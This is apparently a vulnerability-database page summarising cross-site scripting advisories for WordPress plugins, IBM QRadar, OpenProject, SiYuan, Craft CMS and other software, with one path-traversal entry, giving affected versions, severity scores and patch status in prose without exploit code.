WP Rocket, a popular WordPress performance optimization plugin, contains a Stored Cross-Site Scripting (XSS) vulnerability in versions up to 3.19.4 that allows authenticated attackers with high privileges to inject malicious scripts into web pages. An attacker with administrator or equivalent access can craft specially-formatted input that bypasses input sanitization, resulting in persistent XSS that executes in the browsers of other site users. The vulnerability has a CVSS score of 5.9 (Medium), requiring high privileges and user interaction, with no evidence of active exploitation in the wild or public proof-of-concept code.
A reflected cross-site scripting (XSS) vulnerability exists in the WP eMember WordPress plugin by Tips and Tricks HQ, affecting all versions up to and including 10.2.2. An attacker can craft malicious URLs that, when clicked by authenticated users, execute arbitrary JavaScript in the victim's browser context. This vulnerability has been publicly disclosed by Patchstack with no indication of active exploitation in the wild or KEV listing at this time.
The SlimStat Analytics plugin for WordPress contains a Stored Cross-Site Scripting vulnerability in the 'fh' (fingerprint) parameter that allows unauthenticated attackers to inject malicious scripts into pages. All versions up to and including 5.3.5 are affected due to insufficient input sanitization and output escaping. The vulnerability has a CVSS score of 7.2 with network-based attack vector requiring no privileges or user interaction, though no active exploitation (KEV) or EPSS data is currently reported.
IBM QRadar SIEM contains a reflected or stored cross-site scripting (XSS) vulnerability in the Web UI that allows authenticated users to inject arbitrary JavaScript code, potentially altering system functionality and compromising the integrity of security monitoring. The vulnerability affects QRadar SIEM versions 7.5.0 through 7.5.0 Update Package 14. An attacker with valid credentials can craft malicious payloads to execute client-side code in the context of other users' sessions, leading to session hijacking, credential theft, or unauthorized configuration changes. A patch is available from IBM, and this vulnerability is not currently listed in CISA's KEV catalog, suggesting limited evidence of active exploitation in the wild at this time.
IBM QRadar SIEM versions 7.5.0 through 7.5.0 Update Package 14 contain a cross-site scripting (XSS) vulnerability in the Web UI that allows authenticated users to inject arbitrary JavaScript code. An attacker with valid credentials can exploit this vulnerability to alter UI functionality and potentially steal session credentials or perform actions on behalf of the victim user within their trusted session. A patch is available from the vendor, though no public exploitation toolkit or widespread active exploitation has been reported at the time of this analysis.
OpenProject's Repositories module contains a stored cross-site scripting (XSS) vulnerability that occurs when displaying filenames from repository changesets. Attackers with repository push access can inject malicious HTML code via specially crafted filenames, which executes when project members view affected changesets. This affects OpenProject versions prior to 16.6.9, 17.0.6, 17.1.3, and 17.2.1, with a CVSS score of 9.1 indicating critical severity.
A reflected cross-site scripting (XSS) vulnerability exists in NLTK's WordNet Browser application (nltk.app.wordnet_app) in the lookup_... route, where attacker-controlled word parameters are reflected into HTML responses without proper escaping. This vulnerability affects users running the local WordNet Browser server and allows attackers to inject and execute arbitrary JavaScript in the browser context of the affected application. A proof-of-concept exploit has been publicly demonstrated, and a vendor patch is available.
A stored cross-site scripting (XSS) vulnerability exists in Filament Table's Range and Values summarizers, which render database values without HTML escaping. Affected products include filament_tables (Composer package), where an attacker with low privileges can inject malicious HTML or JavaScript into database columns used by these summarizers, executing arbitrary scripts when other users view the table. No KEV listing or EPSS data is available, but proof-of-concept details are documented in GitHub advisories GHSA-vv3x-j2x5-36jc.
A stored cross-site scripting (XSS) vulnerability in Statamic CMS allows authenticated users with asset upload permissions to bypass SVG sanitization during asset reuploads, enabling injection of malicious JavaScript that executes when other users view the compromised asset. The vulnerability affects Statamic CMS versions prior to 5.73.14 and 6.7.0, with patches available in those releases. The CVSS score of 8.7 (High) reflects the changed scope and high confidentiality/integrity impact, though exploitation requires low-privileged authenticated access and user interaction.
Path traversal in ApostropheCMS import-export module allows authenticated users with content modification permissions to write files outside the intended export directory via malicious archive entries containing directory traversal sequences. An attacker with editor-level access can exploit this vulnerability to overwrite arbitrary files on the system with CVSS 9.9 critical severity. No patch is currently available for this vulnerability affecting Node.js environments.
A reflected cross-site scripting (XSS) vulnerability exists in the `return_to` query parameter of the Avo Ruby gem (pkg:rubygems/avo), allowing attackers to inject arbitrary JavaScript that executes when users click dynamically generated navigation buttons. The vulnerability affects both authenticated and unauthenticated deployments, with unauthenticated setups being directly exploitable via crafted links. The CWE-79 classification confirms this as a classic reflected XSS issue without a published CVSS score or EPSS metric currently available.
PySpector versions 0.1.6 and earlier contain a stored Cross-Site Scripting (XSS) vulnerability in the HTML report generator that fails to sanitize JavaScript payloads embedded within scanned Python code. When a victim scans a malicious Python file crafted by an attacker and opens the resulting HTML report in a browser, the embedded JavaScript executes in the local file context, potentially enabling DOM manipulation, page redirects, and theft of locally accessible data. A proof-of-concept demonstrating the vulnerability has been publicly disclosed.
SiYuan's Bazaar marketplace fails to sanitize package metadata (displayName, description) before rendering in the Electron desktop application, allowing stored XSS that escalates to arbitrary remote code execution. Any SiYuan user (versions ≤3.5.9) who browses the Bazaar will automatically execute attacker-controlled code with full OS-level privileges when a malicious package card renders-no installation or user interaction required. A functional proof-of-concept exists demonstrating command execution via img onerror handlers, and this vulnerability is actively tracked in GitHub's advisory database (GHSA-mvpm-v6q4-m2pf), making it a critical supply-chain risk to the SiYuan user community.
SiYuan's Bazaar (community package marketplace) fails to sanitize HTML in package README files during rendering, allowing stored XSS that escalates to remote code execution due to unsafe Electron configuration. An attacker can submit a malicious package with embedded JavaScript in the README that executes with full Node.js access when any user views the package details in the Bazaar. This affects SiYuan versions 3.5.9 and earlier across Windows, macOS, and Linux, with a CVSS score of 9.6 and multiple real-world exploitation vectors including data theft, reverse shells, and persistent backdoors.
A stored cross-site scripting (XSS) vulnerability exists in the Post SMTP WordPress plugin through version 3.8.0, allowing unauthenticated attackers to inject malicious scripts via the 'event_type' parameter. The vulnerability requires the Post SMTP Pro plugin with its Reporting and Tracking extension to be enabled for exploitation. With a CVSS score of 7.2 and unauthenticated network-based exploitation possible, this represents a moderate-to-high severity risk for WordPress sites using both the free and Pro versions of Post SMTP together.
The Code Embed plugin for WordPress (versions up to 2.5.1) contains a stored cross-site scripting vulnerability that allows authenticated attackers with Contributor-level access or higher to inject arbitrary JavaScript into pages through custom field meta values. The vulnerability exists because the plugin's sanitization function only runs during post saves, while WordPress AJAX endpoints can add meta fields without triggering sanitization, and the plugin then outputs these unsanitized values directly without HTML escaping. An attacker can inject malicious scripts that execute whenever any user visits an affected page, potentially leading to session hijacking, credential theft, or malware distribution.
OpenText ZENworks Service Desk contains an improper input neutralization vulnerability (CWE-79 Cross-Site Scripting) that allows attackers to inject and execute arbitrary JavaScript in the context of a user's browser session. Affected versions are 25.2 and 25.3. Successful exploitation enables unauthorized actions on behalf of the user, including session hijacking, credential theft, or lateral movement within the service desk application.
This vulnerability is a stored cross-site scripting (XSS) flaw in Craft CMS's element editor revision/draft context menu that renders user-supplied fullName data as raw HTML without proper sanitization. A low-privileged control panel user (such as an Author) can inject malicious JavaScript into their profile's fullName field, which executes when an administrator views the revision context menu. If weaponized with a carefully crafted payload while an administrator is authenticated, an attacker can escalate their account privileges to administrator level. A patch is available in Craft CMS version 5.9.11.
The beefree.io SDK contains a Stored Cross-Site Scripting (XSS) vulnerability in the Social Media icon URL parameter within its email builder functionality, allowing attackers to inject arbitrary HTML and JavaScript code that persists in email templates and executes when preview pages are visited. The vulnerability affects beefree.io SDK versions prior to 3.47.0 across all platforms. While the impact is partially mitigated by beefree's Content Security Policy, attackers can still achieve limited script execution and social engineering attacks, making this a moderate-risk vulnerability that requires immediate patching.
A cross-site scripting vulnerability (CVSS 7.1) that allows an unauthenticated remote attacker. High severity vulnerability requiring prompt remediation.
The Writeprint Stylometry WordPress plugin (versions up to 0.1) contains a Reflected Cross-Site Scripting (XSS) vulnerability in the bjl_wprintstylo_comments_nav() function that fails to properly sanitize and escape the 'p' GET parameter before outputting it in HTML href attributes. An attacker can craft a malicious link containing arbitrary JavaScript code and trick users into clicking it, resulting in session hijacking, credential theft, or malware distribution. The vulnerability requires user interaction (clicking a link) but has a network attack vector with low complexity and no privilege requirements, making it a practical threat in WordPress ecosystems.
Quick Facts
- Typical Severity
- MEDIUM
- Category
- web
- Total CVEs
- 38830